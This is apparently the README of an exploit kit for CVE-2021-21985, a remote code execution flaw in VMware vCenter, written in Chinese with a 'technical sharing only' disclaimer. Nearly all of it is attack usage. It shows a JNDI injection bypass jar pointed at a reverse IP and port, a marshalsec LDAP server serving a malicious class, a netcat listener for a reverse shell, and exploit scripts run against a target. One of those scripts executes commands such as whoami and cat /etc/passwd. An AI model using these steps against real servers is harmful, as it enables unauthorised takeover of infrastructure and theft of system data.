CVE-2021-21985 EXP
本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。
rmi需要bypass高版本jdk
java -jar JDNIInjection-Bypass.jar <lport> <reverse_ip> <reverse_port>
或者利用ldap协议(未测试)
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip:8080/#Exploit
ldap://ip:port/Exploit
nc -lvp 8443
python3 CVE-2021-21985_exp.py <target> <rmi://ip/class>
help
RCE!
python3 CVE-2021-21985_echo.py https://x.x.x.x <cmd>
执行 whoami
执行 cat /etc/passwd
https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/
https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis